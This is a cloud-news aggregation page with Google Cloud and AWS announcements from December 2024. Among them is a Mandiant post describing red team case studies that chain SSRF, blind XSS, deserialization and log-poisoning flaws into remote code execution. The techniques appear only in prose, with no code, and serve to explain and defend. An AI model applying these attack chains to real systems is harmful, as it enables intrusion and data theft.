Cloud

2024 12 05

GCP – Registration is open for Partner Summit at Google Cloud Next

Partner Summit at Google Cloud Next is returning April 8–11, 2025, in Las Vegas!

Our last event was full of highlights, and we’ve got even more in store for partners in 2025.

Based on your feedback, Partner Summit 2025 will begin on Tuesday, April 8 – one day before Google Cloud Next kicks off – to offer a dedicated day of partner breakout sessions and learning opportunities before the main event begins. The Partner Summit Lounge, partner keynote, lightning talks, and more will all be available April 9–11, 2025.

Partner Summit is your exclusive opportunity to:

Accelerate your business by aligning on joint business goals, learning about new programmatic and incentive opportunities, and diving deep into cutting-edge insights in our Partner Summit breakout sessions and lightning talks.
Build new connections as you network with other partners and Googlers while you explore the activities and perks located in our exclusive Partner Summit Lounge.
Get a look at what’s next from Google Cloud leadership at the dedicated partner keynote to learn about where cloud is headed – and how our partners are central to our mission.
Make the most of our partnership with personalized advice from Google Cloud team members on incentives, certifications, co-marketing, and more at our Meet the Experts booths.

Get ready to learn, connect, and build the future of business with us. Early bird registration is now open for $999. This special rate is only available through February 14, 2025, or until tickets are sold out.

Register now

Read More for the details.

2024 12 05

GCP – Registration is open for Google Cloud Next 2025

Cloud, Google Cloud gcp

Google Cloud Next returns to Las Vegas, April 9–11, 2025^* and I’m thrilled to share that registration is now live! We welcomed 30,000 attendees to our largest flagship conference in Google Cloud history this past April, and 2025 will be even bigger and better than ever.

Join us for an unforgettable week of hands-on experiences, inspiring content, problem-solving with our top partners and seize the opportunity to learn from top experts and peers tackling the same challenges you are day in and day out. Walk away with new ideas, breakthrough skills and actionable knowledge only available at Google Cloud Next 2025.

Early bird registration is now available for just $999 for a limited time^**.

Here’s why you need to be at Next:

Experience AI in Action: Immerse yourself in the latest technology; build your next agent; explore our demos, hackathons, and workshops; and learn how others are harnessing the power of AI to propel their businesses to new heights.
Forge Powerful Connections: Network with peers, industry experts, and the brightest minds in tech to exchange ideas, spark collaborations, and shape the future of your industry.
Build and Learn Live: With a wealth of demos and workshops, hackathons, keynotes, and deep dives, Next is the place to be for the builders, dreamers, and doers shaping the future of technology.

Don’t miss out!

Register now.

^{* Select programming to take place in the afternoon of April 8.
** Space is limited, and this offer is only valid through 11:59 PM PT on February 14, 2025, or until tickets are sold out.}

Read More for the details.

2024 12 05

GCP – How the Air Force Research Laboratory is Advancing Defense Research with AI

Cloud, Google Cloud gcp

Through our collaboration, the Air Force Research Laboratory (AFRL) is leveraging Google Cloud’s cutting-edge artificial intelligence (AI) and machine learning (ML) capabilities to tackle complex challenges across various domains, from materials science and bioinformatics to human performance optimization. AFRL, the center for scientific research and development for the U.S. Air Force and Space Force, is embracing the transformative power of AI and cloud computing to accelerate its mission of developing and transitioning advanced technologies to the air, space, and cyberspace forces.

This collaboration not only enhances AFRL’s research capabilities, but also aligns with broader Department of Defense (DoD) initiatives to integrate AI into critical operations, bolster national security, and maintain technological advantage by demonstrating game-changing technologies that enable technical superiority and help the Air Force adopt to cutting edge technologies as soon as they are released. By harnessing Google Cloud’s scalable infrastructure, comprehensive generative AI offerings and collaborative environment, the AFRL is driving innovation and ensuring the U.S. Air Force and Space Force remain at the forefront of technological advancement.

Let’s delve into examples of how the AFRL and Google Cloud are collaborating to realize the benefits of AI and cloud services:

Bioinformatics breakthroughs: The AFRL’s bioinformatics research was once hindered by time-consuming manual processes and data bottlenecks, causing delays in moving and sharing data, getting access to US-based tools, using standard storage and hardware, and having the right system communications and integrations across third party infrastructure. Because of this, cross-team collaboration and experiment expansion was severely limited and inefficiently tracked. With very little cloud experience, the team was able to create a siloed environment where they used Google Cloud’s infrastructure, such as Google Compute Engine, Cloud Workstations, and Cloud Run to build analytic pipelines that helped them test, store, and analyze data in an automated and streamlined way. That data pipeline automation paved the way for further exploration and expansion on a use case that had never been done before.

Web app efficiency for lab management: The AFRL’s complex lab equipment scheduling process resulted in challenges in providing scalable, secure access to important content and information for users in different labs. To mitigate these challenges and ease maintenance for non-programmer researchers and lab staff, the team built a custom web application based on Google App Engine, integrated with Google Workspace and Apps Scripts, so that they could capture usage metrics for future hardware investment decisions and automate admin tasks that were taking time away from research. The result was significantly faster ability to make changes without administrator intervention, a variety of self-service options for users to schedule time on equipment and request training, and an enhanced, scalable design architecture with built-in SSO that helped streamline internal content for multiple labs.

Modeling insights into human performance: Understanding and optimizing human performance is critical for the AFRL’s mission. The FOCUS Mission Readiness App, built on Google Cloud utilizes various infrastructure services, such as Cloud Run, Cloud SQL, and GKE and integrates with the Garmin Connect APIs to collect and analyze real-time data from wearables.

By leveraging Google Cloud’s BigQuery and other analytics tools, this app provides personalized insights and recommendations for fatigue interventions and predictions that help capture valuable improvement mechanisms in cognitive effectiveness and overall well-being for Airmen.

Streamlined AI model development with Vertex AI:

The AFRL wanted to replicate the functionality of university HPC clusters, especially since there was a diversity of users that needed extra compute and not everyone was trained on how to use these tools. They wanted an easy GUI and to maintain active connections where they could develop AI models and test their research with confidence. They leveraged Google Cloud’s Vertex AI and Jupyter Notebooks through Workbench, Compute Engine, Cloud Shell, Cloud Build and much more to get a head start in creating a pipeline that could be used for sharing, ingesting, and cleaning their code. Having access to these resources helped create a flexible environment for researchers to do model development and testing in an accelerated manner.

Cloud capabilities and AI/ML tools provide a flexible and adaptable environment that empowers our researchers to rapidly prototype and deploy innovative solutions. It’s like having a toolbox filled with powerful AI building blocks that can be combined to tackle our unique research challenges.

Dr. Dan Berrigan

Air Force Research Laboratory

The AFRL’s collaboration with Google Cloud exemplifies how AI and cloud services can be a driving force behind innovation, efficiency, and problem-solving across agencies. As the government continues to invest in AI research and development, collaborations like this will be crucial for unlocking the full potential of AI and cloud computing, ensuring that agencies across the federal landscape can leverage these transformative technologies to create a more efficient, effective, and secure future for all.

Learn more about how we’ve helped government agencies accelerate their mission and impact with AI.

Watch the Google Public Sector Summit On Demand to gain crucial insights on the critical intersection of AI and Security in the public sector.

Read More for the details.

2024 12 05

GCP – Bridging the Gap: Elevating Red Team Assessments with Application Security Testing

Cloud, Google Cloud gcp

Written by: Ilyass El Hadi, Louis Dion-Marcil, Charles Prevost

Executive Summary

Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security (AppSec) expertise enables organizations to better simulate the tactics and techniques of modern adversaries. This includes:

Leveraging minimal access for maximum impact: There is no need for high privilege escalation. Red Team objectives can often be achieved with limited access, highlighting the importance of securing all internet-facing assets.
Recognizing the potential of low-impact vulnerabilities through vulnerability chaining: Low- and medium-impact vulnerabilities can be exploited in combination to achieve significant impact.
Developing your own exploits: Skilled adversaries or consultants will invest the time and resources to reverse-engineer and/or find zero-day vulnerabilities in the absence of public proof-of-concept exploits.
Employing diverse skill sets: Red Team members should include individuals with a wide range of expertise, including AppSec.
Fostering collaboration: Combining diverse skill sets can spark creativity and lead to more effective attack simulations.
Integrating AppSec throughout the engagement: Offensive application security contributions can benefit Red Teams at every stage of the project.

By embracing this approach, organizations can proactively defend against a constantly evolving threat landscape, ensuring a more robust and resilient security posture.

Introduction

In today’s rapidly evolving threat landscape, organizations find themselves engaged in an ongoing arms race against increasingly sophisticated cyber criminals and nation-state actors. To stay ahead of these adversaries, many organizations turn to Red Team assessments, simulating real-world attacks to expose vulnerabilities before they are exploited. However, many traditional Red Team assessments typically prioritize attacking network and infrastructure components, often overlooking a critical aspect of modern attack surfaces: web applications.

This gap hasn’t gone unnoticed by cyber criminals. In recent years, industry reports consistently highlight the evolving trend of attackers exploiting public-facing application vulnerabilities as a primary entry point into organizations. This aligns with Mandiant’s observations of common tactics used by threat actors, as observed in our 2024 M-Trends Report: “In intrusions where the initial intrusion vector was identified, 38% of intrusions started with an exploit. This is a six percentage point increase from 2022.”

The 2024 M-Trends Report also documents that 28.7% of Initial Compromise access is obtained through exploiting public-facing web applications (MITRE T1190).

Figure 1: Initial Compromise statistics from the M-Trends report

At Mandiant, we recognize this gap and are committed to closing it by integrating AppSec expertise into our Red Team assessments. This optional approach is offered to customers who wish to increase the coverage of their external perimeters to gain a deeper understanding of their security posture. While most of the infrastructure typically receive a considerable amount of security scrutiny, web applications and edge devices often lack the same level of consideration, making them prime targets for attackers.

This integrated approach is not limited to full-scope Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.

The Role of Application Security in Red Team Assessments

The integration of AppSec specialists into Red Team assessments manifests in a unique staffing approach. The role of this specialist is to augment the Red Team’s capabilities with the ever-evolving exploitation techniques used by adversaries to breach organizations from the external perimeter.

The AppSec specialist will often get involved as early as possible on an engagement, even during the scoping and early planning stages. They perform a meticulous review of the target perimeter, mapping out the various application inventory and identifying vulnerabilities within the various components of web applications and application programming interfaces (APIs) exposed to the internet.

While examination is underway, Red Team operators concurrently focus on other crucial aspects of the assessment, including infrastructure preparation, crafting convincing phishing campaigns, developing and refining tools, and creating effective payloads that will evade the target environment’s controls and defense mechanisms.

Once an AppSec vulnerability of critical impact is discovered, the team will generally proceed to its exploitation, notifying our primary point of contact of our preliminary findings and validating the potential impacts of our discovery. It is important to note that a successful finding doesn’t always result in a direct foothold in the target environment. The intelligence gathered through the extensive reconnaissance and perimeter review phase can be repurposed for various aspects of the Red Team mission. This could include:

Identifying valuable reconnaissance targets or technologies to fine-tune a social engineering campaign
Further tailoring an attack payload
Establishing a temporary foothold that might lead to further exploitation
Hosting malicious payloads for later stages of the attack simulation

Once the external perimeter examination phase is complete, our Red Team operators will begin carrying out the remaining mission objectives, empowered with the AppSec team’s insights and intelligence, including identified vulnerabilities and associated exploits. Even though the Red Team operators will perform most of the remaining activities at this point, the AppSec consultants will stay close to the engagement and often engage to further support internal exploitations efforts. For example, applications that are only accessible internally generally get a lot less scrutiny and are consequently assessed much less frequently than externally accessible assets.

By incorporating AppSec expertise, we’ve achieved a significant increase of engagements where our Red Team successfully gained a significant advantage during a customer’s external perimeter review, such as obtaining a foothold or gaining access to confidential information. This overall approach translates to a more realistic and valuable assessment for our customers, ensuring comprehensive coverage of both network and application security risks. By uncovering and addressing vulnerabilities across the entire attack surface, Mandiant empowers organizations to proactively defend against a wide array of threats, strengthening their overall security posture.

Case Studies: Demonstrating the Impact of Application Security Support

In this section, we focus on four of the multiple real-world scenarios where the support of Mandiant’s AppSec Team has significantly enhanced the effectiveness of Red Team assessments. Each case study highlights the attack vectors, the narrative behind the attack, key takeaways from the experience, and the associated assumptions and misconceptions.

These case studies highlight the value of incorporating application security support in Red Team engagements, while also offering valuable learning opportunities that promote collaboration and knowledge sharing.

Unlocking the Vault: Exposed API Key to Sensitive Internal Document Access

Context

A company in the energy sector engaged Mandiant to assess the efficiency of its cybersecurity team’s abilities in detection, prevention, and response. Because the organization had grown significantly in the past years following multiple acquisitions, Mandiant suggested an increased focus on their external perimeter. This would allow the organization to measure the subsidiaries’ external security posture, compared to the parent organization’s.

Target of Interest

Following a thorough reconnaissance phase, the AppSec Team began examination of a mobile application developed by the customer for its business partners. Once the mobile application was decompiled, a hardcoded API key granting unauthorized access to an external API service was discovered. Leveraging the API key, authenticated reconnaissance on the API service was conducted, which led to the discovery of a significant vulnerability within the application’s PDF generation feature: a full-read Server-Side Request Forgery (SSRF), enabled through HTML injection.

Vulnerability Identification

During the initial reconnaissance phase, the team observed that numerous internal systems’ hostnames were publicly accessible through certificate transparency logs. With that in mind, the objective was to exploit the SSRF vulnerability to determine if any of these internal systems were reachable via the external API service. Eventually, one such host was identified: a commercial ASP.NET document management solution. Once the solution’s name and version were identified, the AppSec Team searched for known vulnerabilities online. Among the findings was a recent CVE entry regarding insecure ViewState deserialization, which included details about the affected dynamic-link library (DLL) name.

Exploitation

With no public exploit proof-of-concepts available, the team searched for the DLL without success until the file was found in VirusTotal’s public corpus. The DLL was then decompiled into C# code, revealing the vulnerable function, which provided all the necessary components for a successful exploitation. Next, the application security consultants leveraged the post-authentication SSRF vector to exploit the ViewState deserialization vulnerability, affecting the internal application. This attack chain led to a reliable foothold into the parent organization’s internal network.

Figure 2: HTML to PDF Server-Side Request Forgery to deserialization

Takeaways

The organization’s demilitarized zone (DMZ) was now breached, and the remote access could be passed off to the Red Team operators. This enabled the operators to perform lateral movement into the network and achieve various predetermined objectives. However, the customer expressed high satisfaction with the demonstrated impact prior to lateral movement, especially since the application server housed numerous sensitive documents. This underscores a common misconception that exploiting the external perimeter must necessarily result in facilitating lateral movement within the internal network. Yet, the impact was evident even before lateral movement, simply by gaining access to the customer’s sensitive data.

Breaking Barriers: Blind XSS as a Gateway to Internal Networks

Context

A company operating in the technology industry engaged Mandiant for a Red Team assessment. This company, with a very mature security program, requested that no phishing be performed because they were already conducting numerous internal phishing and vishing exercises. They highlighted that all previous Red Team engagements had relied heavily on various social engineering methods, and the success rate was consistently low.

Target of Interest

During the external reconnaissance efforts, the AppSec Team identified multiple targets of interest, such as a custom-built customer relationship management (CRM) solution. Leveraging the Wayback Machine on the CRM hostname, a legacy endpoint was discovered, which appeared obsolete but still accessible without authentication.

Vulnerability Identification

Despite not being accessible through the CRM’s user interface, the endpoint contained a functional form to request support. The AppSec Team injected a blind cross-site scripting (XSS) payload into the form, which loaded an external JavaScript file containing post-exploitation code. When successful, this method allows an adversary to temporarily hijack the targeted user’s browser tab, allowing attackers to perform actions on behalf of the user. Moments later, the team received a notification that the payload successfully executed within the context of a user browsing an internal customer support administration panel.

The AppSec Team analyzed the exfiltrated Document Object Model (DOM) to further understand the payload’s execution context and assess the data accessible within this internal application.The analysis revealed references to Apache Tapestry framework version 3, a framework initially released in 2004. Shortly after identifying the internal application’s framework, Mandiant deployed a local Tapestry v3 instance to identify potential security pitfalls. Through code review, Mandiant discovered a zero-day deserialization vulnerability in the core framework, which led to remote code execution (RCE). Apache Software Foundation assigned CVE-2022-46366 for this RCE.

Exploitation

The zero-day, which affected the internal customer support application, was exploited by submitting an additional blind XSS payload. Crafted to trigger upon form submission, the payload autonomously executed in an employee’s browser, exploiting the internal application’s deserialization flaw. This led to a crucial foothold within the client’s infrastructure, enabling the Red Team to progress with their lateral movement until all objectives were successfully accomplished.

Figure 3: Remote code execution staged with blind cross-site scripting

Takeaways

This real-world scenario highlights a common misconception that cross-site scripting holds minimal relevance in Red Team assessments. The significance and impact of this particular attack vector in this case study were evident: it acted as a gateway, breaching the external network and leveraging an employee’s internal network position as a proxy to exploit the internal application. Mandiant had not previously identified XSS vulnerabilities on the external perimeter, which further highlights how the security posture of the external perimeter can be much more robust than that of the internal network.

Logger Danger: From Log Files to Unauthorized Cloud Access

Context

An organization in the transportation sector engaged Mandiant to perform a Red Team assessment, with the goal of emulating an initial access broker (IAB) threat group, focused on breaching externally exposed systems and services. Those groups, who typically resell illegitimate access to compromised victims’ environments, were previously identified as a significant threat to the organization by the Google Threat Intelligence (GTI) team while building a threat profile to help support assessment activities.

Target of Interest

Among hundreds of external applications identified during the reconnaissance phase, one stood out: a commercial Java-based supply chain management solution hosted in the cloud. This application brought additional attention upon discovery of an online forum post describing its installation procedures. Within the post, a link to an unlisted YouTube video was shared, offering detailed installation and administration guidance. Upon reviewing the video, the AppSec Team noted the URL for the application’s trial installer, still accessible online despite not being referenced or indexed anywhere else.

Following installation and local deployment, an administration manual was available within the installation folder. This manual contained a section for a web-based performance monitor plugin that was deployed by default with the application, along with its default credentials. The plugin’s functionality included logging performance metrics and stack traces locally in files upon encountering unhandled errors. Furthermore, the plugin’s endpoint name was uniquely distinct, making it highly unlikely to be discovered with conventional directory brute-forcing methods.

Vulnerability Identification

The AppSec Team successfully logged into the organization’s performance monitor plugin by using the default credentials sourced from the administration manual and resumed local testing to identify post-authentication vulnerabilities. Conducting code review in parallel with manual testing, a log management feature was identified, which allowed authenticated users to manipulate log filenames and directories. The team also observed they could induce errors through targeted, malformed HTTP requests. In conjunction with the log filename manipulation, it was possible to force arbitrary data to be stored at an arbitrary file location on the underlying server’s file system.

Exploitation

The strategy involved intentionally triggering exceptions, which the performance monitor would then log in an attacker-defined Jakarta Server Pages (JSP) file within the web application’s root directory. The AppSec Team crafted an exploit that injected arbitrary JSP code into an HTTP request’s parameter, forcing the performance monitor to log errors into the attacker-controlled JSP file. Upon accessing the JSP log file, the injected code executed, enabling Mandiant to breach the customer’s cloud environment and access thousands of sensitive logistics documents.

Figure 4: Remote code execution through log file poisoning

Takeaways

A common assumption that breaches should lead to internal on-premises network access or to Active Directory compromise was challenged in this case study. While lateral movement was constrained by time, the primary objective was achieved: emulating an initial access broker. This involved breaching the cloud environment, where the client lacked visibility compared to its internal Active Directory network, and gaining access to business-critical crown jewels.

Collaborative Intrusion: Webhooks to CI/CD Pipeline Access

Context

A company in the automotive sector engaged Mandiant to perform a Red Team assessment, with the goal of obtaining access to their continuous integration and continuous delivery/deployment (CI/CD) pipeline. Due to the sheer number of externally exposed systems, the AppSec Team was staffed to support the Red Team’s reconnaissance and breaching efforts.

Target of Interest

Most of the interesting applications were redirecting to the customer’s single-sign on (SSO) provider. However, one application had a different behavior. By querying the Wayback Machine, the team uncovered an endpoint that did not redirect to the SSO. Instead, it presented a blank page with a unique favicon. With the goal of identifying the application’s underlying technology, the favicon’s hash was calculated and queried using Shodan. The results returned many other live applications sharing the same favicon. Interestingly, some of these applications operated independently of SSO, aiding the team in identifying the application’s name and vendor.

Vulnerability Identification

Once the application’s name was identified, the team visited the vendor’s website and accessed their public API documentation. Among the API endpoints, one stood out—it could be directly accessed on the customer’s application without redirection to the SSO. This API endpoint did not require authentication and only took an incremental numerical ID as its parameter’s value. Upon querying, the response contained sensitive employee information, including email addresses and phone numbers. The team systematically iterated through the API endpoint, incrementing the ID parameter to compile a comprehensive list of employee email addresses and phone numbers. However, the Red Team refrained from leveraging this data, as another intriguing application was discovered. This application exposed a feature that could be manipulated into sending fully user-controlled emails from the company’s no-reply@ email address.

Capitalizing on these vulnerabilities, the Red Team initiated a phishing campaign, successfully gaining a foothold in the customer’s network before the AppSec Team could identify an external breach vector. As efforts continued on the internal post-exploitation, the application security consultants shifted their focus to support the Red Team’s efforts within the internal network.

Exploitation

Digging into network shares, the Red Team found credentials of a developer for an enterprise source control application account. The AppSec Team sifted through reconnaissance data and flagged that the same source control application server was exposed externally. The credentials were successfully used to log in, as multi factor authentication was absent for this user. Within the GitHub interface, the team uncovered a pre-defined webhook linked to the company’s internal Jenkins—an integration commonly employed for facilitating communication between source control systems and CI/CD pipelines. Leveraging this discovery, the team created a new webhook. When manually triggered by the team, this webhook would perform an SSRF to internal URLs. This eventually led to the exploitation of an unauthenticated Jenkins sandbox bypass vulnerability (CVE-2019-1003030), and ultimately in remote code execution, effectively compromising the organization’s CI/CD pipeline.

Figure 5: External perimeter breach via CI/CD SSRF

Takeaways

In this case study, the efficacy of collaboration between the Red Team and the AppSec Team was demonstrated. Leveraging insights gathered collectively, the teams devised a strategic plan to achieve the main objective set by the customer: accessing its CI/CD pipelines. Moreover, we challenged the misconception that singular critical vulnerabilities are indispensable for reaching objectives. Instead, we revealed the reality where achieving goals often requires innovative detours. In fact, a combination of vulnerabilities or misconfigurations, whether they are discovered by the AppSec Team or the Red Team, can be strategically chained together to accomplish the mission.

Conclusion

As this blog post demonstrated, the integration of application security expertise into Red Team assessments yields significant benefits for organizations seeking to understand and strengthen their security posture. By proactively identifying and addressing vulnerabilities across the entire attack surface, including those commonly overlooked by traditional approaches, businesses can minimize the risk of breaches, protect critical assets, and hopefully avoid the financial and reputational damage associated with successful attacks.

This integrated approach is not limited to Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.

Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security expertise enables organizations to better simulate the tactics and techniques of modern adversaries.

Read More for the details.

2024 12 04

GCP – ¡Hola Mexico! Google Cloud region in Querétaro now open

Cloud, Google Cloud gcp

Google Cloud is delighted to announce the opening of our 41st cloud region in Querétaro, Mexico. This marks our third cloud region in Latin America, joining Santiago, Chile, and São Paulo, Brazil. From Querétaro, we’ll provide fast, reliable cloud services to businesses and public sector organizations throughout Mexico and beyond. This new region offers low latency, high performance, and local data residency, empowering organizations to innovate and accelerate digital transformation initiatives.

Helping organizations in Mexico thrive in the cloud

Google Cloud regions are major investments to bring best-in-class infrastructure, cloud and AI technologies closer to customers. Enterprises, startups, and public sector organizations can leverage Google Cloud’s infrastructure economy of scale and global network to deliver applications and digital services to their end users.

With this new region in Querétaro, Mexico, Google Cloud customers enjoy:

Speed: Serve your end users with fast, low-latency experiences, and transfer large amounts of data between networks easily across Google’s global network.
Security: Keep your organizations’ and customers’ data secure and compliant, including meeting the requirements of CNBV contractual frameworks, and maintain local data residency.
Capacity: Scale to meet growing user and business needs.
Sustainability: Reduce the carbon footprint of your IT environment and help meet sustainability targets.

aside_block: <ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3edc867b96d0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

Google Cloud customers are eager to benefit from the new possibilities that this cloud region offers:

“At Prosa, we have been undergoing a transformation process for the past three years that involves adopting technology and developing digital skills within our teams. The partnership with Google has been key to carrying out projects, evolving towards digital business models, enabling the ecosystem, promoting the API-ification of services, and improving data analysis. This alliance is only deepened with the launch of the new Google Cloud region, which will facilitate the integration of participants into the payment ecosystem in a secure and highly available manner, improving the customer experience and delivering value more quickly and agilely,” said Salvador Espinosa, CEO of Prosa, a payment technology company that processed more than 10 million transactions in 2023.

Building a new Google Cloud region in Querétaro, Mexico is welcomed by the Mexican public sector.

“The new Google cloud region in Mexico will be key to build a digital government accountable to citizens, deepening our path to digital transformation. Since 2018, the Auditoria Superior de la Federación (ASF) has pioneered digital transformation in Mexico, promoting innovation and the responsible use of technology, while using advanced technologies like Google Cloud’s Vertex AI, among other proprietary tools, to enhance data analysis, automate processes, and improve collaboration. This enables more accurate decision-making, optimized oversight of public spending, increased inspection coverage, and transparent use of resources. Thanks to the cloud, we see a future where technology is a strategic ally to execute efficient, agile and exhaustive digital audits, detect irregularities early, and strengthen accountability. ASF’s focus on transparency and efficiency aligns with President Claudia Sheinbaum’s public innovation policy.” – Emilio Barriga Delgado, Special Auditor of Federalized Expenditure, Auditoria Superior de la Federación

The new cloud region also opens new opportunities for our global ecosystem of over 100,000 incredibly diverse partners.

“For Amarello and our customers, the availability of a new region in Mexico demonstrates the great growth of Google Cloud and its commitment to Mexico. It’s also a great milestone for the country, putting us on par with other economies. This will create jobs that will speed up our clients’ adoption of strategic projects and latency-sensitive technological services such as financial services or mission-critical operations. At the same time, the new region will enable projects that require information to be maintained within the national territory, now on the most innovative and secure public cloud.” – Mauricio Sánchez Valderrama, managing partner, Amarello Tecnologías de Información

And for global companies looking to tap into the Mexican market:

As networks shift to a cloud-first approach, and hybrid work enables work from anywhere, businesses in the Mexico region can now securely accelerate innovation, boost efficiency, and enhance customer experiences with Palo Alto Networks AI-powered solutions, like Prisma SASE, built in the cloud to secure the cloud at scale. The powerful collaboration between Google Cloud and Palo Alto Networks reinforces our commitment to security and innovation so organizations can confidently embrace the AI-driven future, knowing their users, data, and applications are protected from evolving threats.” Anupam Upadhyaya, Vice President, Product Management, Palo Alto Networks

Delivering on our commitment to Latin America

In 2022, we announced a five-year, $1.2 billion commitment to Latin America, focusing on four key areas: digital infrastructure, digital skills, entrepreneurship, and inclusive, sustainable communities.

This new Google Cloud region in Querétaro, Mexico showcases Google’s continued commitment to that goal and to Latin America’s digital transformation. Increased cloud adoption and productivity as a result of the new cloud region is expected to generate over 100,000 jobs and contribute more than $11 billion to Mexico’s GDP by 2030.

We’re equally committed to creating new career opportunities for people in Mexico and Latin America: We’re working with over 550 universities across Latin America to offer a robust and continuously updated portfolio of learning resources so students can seize the opportunities created by new digital technologies like AI and the cloud. As a result, we’ve already granted more than 14,000 digital skill badges to students and individual developers in Mexico over the last 24 months.

Another example of our commitment is the “Súbete a la nube” program that we created in partnership with the Inter-American Development Bank (IDB), with a focus on women and the southern region of the country. To date, 12,500 people have registered for essential digital skills training in cloud computing through the program.

Today, we’re also announcing a commitment to train 1 million Mexicans in AI and cloud technologies over the coming years. Google Cloud will continue to skill Mexico’s local talent with a variety of no-cost training programs for students, developers and customers. Some of the ongoing training programs will include no-cost, localized courses available through YouTube, credentials through the Google Cloud Skills Boost platform, community support by Google Developer Groups, and scholarships for the Google Career Certificates that help prepare learners for high-growth, in-demand jobs in fields like cybersecurity and data analytics, so the cloud can truly democratize innovation and technology.

This new Google Cloud region is also a step towards providing generative AI products and services to Latin American customers. Cloud computing will increasingly be a key gateway towards the development and usage of AI, helping organizations compete and innovate at global scale.

Google Cloud is dedicated to being the partner of choice for customers undergoing digital transformation. We’re focused on providing sustainable, low-carbon options for running applications and infrastructure. Since 2017, we’ve matched 100% of our global annual electricity use with renewable energy. We’re aiming even higher with our 2030 goal: operating on 24/7 carbon-free energy across every electricity grid where we operate, including Mexico.

We’re incredibly excited to open the Querétaro, Mexico region, bringing low-latency, reliable cloud services to Mexico and Latin America, so organizations can take advantage of all that the cloud has to offer. Stay tuned for even more Google Cloud regions coming in 2025 (and beyond), and click here to learn more about Google Cloud’s global infrastructure.

Read More for the details.

2024 12 04

AWS – AWS announces Amazon SageMaker Partner AI Apps

AWS, Cloud AWS

Today Amazon Web Services, Inc. (AWS) announced the general availability of Amazon SageMaker partner AI apps, a new capability that enables customers to easily discover, deploy, and use best-in-class machine learning (ML) and generative AI (GenAI) development applications from leading app providers privately and securely, all without leaving Amazon SageMaker AI so they can develop performant AI models faster.

Until today, integrating purpose-built GenAI and ML development applications that provide specialized capabilities for a variety of model development tasks, required a considerable amount of effort. Beyond the need to invest time and effort in due diligence to evaluate existing offerings, customers had to perform undifferentiated heavy lifting in deploying, managing, upgrading and scaling these applications. Furthermore, to adhere to rigorous security and compliance protocols, organizations need their data to stay within the confines of their security boundaries without needing to move their data elsewhere, for example, to a Software as a Service (SaaS) application. Finally, the resulting developer experience is often fragmented, with developers having to switch back and forth between multiple disjointed interfaces. With SageMaker partner AI apps you can quickly subscribe to a partner solution and seamlessly integrate the app with your SageMaker development environment. SageMaker partner AI apps are fully managed and run privately and securely in your SageMaker environment reducing the risk of data and model exfiltration.

At launch, you will be able to boost your team’s productivity and reduce time to market by enabling: Comet, to track, visualize, and manage experiments for AI model development; Deepchecks, to evaluate quality and compliance for AI models; Fiddler, to validate, monitor, analyze, and improve AI models in production; and, Lakera, to protect AI applications from security threats such as prompt attacks, data loss and inappropriate content.

SageMaker partner AI apps is available in all currently supported regions except Gov Cloud. To learn more please visit SageMaker partner AI app’s developer guide.

Read More for the details.

2024 12 04

AWS – Task governance is now generally available for Amazon SageMaker HyperPod

AWS, Cloud AWS

Amazon SageMaker HyperPod now provides you with centralized governance across all generative AI development tasks, such as training and inference. You have full visibility and control over compute resource allocation, ensuring the most critical tasks are prioritized and maximizing compute resource utilization, reducing model development costs by up to 40%.

With HyperPod task governance, administrators can more easily define priorities for different tasks and set up limits for how many compute resources each team can use. At any given time, administrators can also monitor and audit the tasks that are running or waiting for compute resources through a visual dashboard. When data scientists create their tasks, HyperPod automatically runs them, adhering to the defined compute resource limits and priorities. For example, when training for a high-priority model needs to be completed as soon as possible but all compute resources are in use, HyperPod frees up resources from lower-priority tasks to support the training. HyperPod pauses the low-priority task, saves the checkpoint, and reallocates the freed-up compute resources. The preempted low-priority task will resume from the last saved checkpoint as resources become available again. And when a team is not fully using the resource limits the administrator has set up, HyperPod use those idle resources to accelerate another team’s tasks. Additionally, HyperPod is now integrated with Amazon SageMaker Studio, bringing task governance and other HyperPod capabilities into the Studio environment. Data scientists can now seamlessly interact with HyperPod clusters directly from Studio, allowing them to develop, submit, and monitor machine learning (ML) jobs on powerful accelerator-backed clusters.

Task governance for HyperPod is available in all AWS Regions where HyperPod is available: US East (N. Virginia), US West (N. California), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Singapore), Asia Pacific (Sydney), and Asia Pacific (Tokyo), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Stockholm), and South America (São Paulo).

To learn more, visit SageMaker HyperPod webpage, AWS News Blog, and SageMaker AI documentation.

Read More for the details.

2024 12 04

AWS – Amazon SageMaker HyperPod now provides flexible training plans

AWS, Cloud AWS

Amazon SageMaker HyperPod announces flexible training plans, a new capability that allows you to train generative AI models within your timelines and budgets. Gain predictable model training timelines and run training workloads within your budget requirements, while continuing to benefit from features of SageMaker HyperPod such as resiliency, performance-optimized distributed training, and enhanced observability and monitoring.

In a few quick steps, you can specify your preferred compute instances, desired amount of compute resources, duration of your workload, and preferred start date for your generative AI model training. SageMaker then helps you create the most cost-efficient training plans, reducing time to train your model by weeks. Once you create and purchase your training plans, SageMaker automatically provisions the infrastructure and runs the training workloads on these compute resources without requiring any manual intervention. SageMaker also automatically takes care of pausing and resuming training between gaps in compute availability, as the plan switches from one capacity block to another. If you wish to remove all the heavy lifting of infrastructure management, you can also create and run training plans using SageMaker fully managed training jobs.

SageMaker HyperPod flexible training plans are available in the US East (N. Virginia), US East (Ohio), and US West (Oregon) AWS Regions. To learn more, visit: SageMaker HyperPod, documentation, and the announcement blog.

Read More for the details.

2024 12 04

AWS – Amazon Bedrock Knowledge Bases now supports structured data retrieval

AWS, Cloud AWS

Amazon Bedrock Knowledge Bases now supports natural language querying to retrieve structured data from your data sources. With this launch, Bedrock Knowledge Bases offers an end-to-end managed workflow for customers to build custom generative AI applications that can access and incorporate contextual information from a variety of structured and unstructured data sources. Using advanced natural language processing, Bedrock Knowledge Bases can transform natural language queries into SQL queries, allowing users to retrieve data directly from the source without the need to move or preprocess the data.

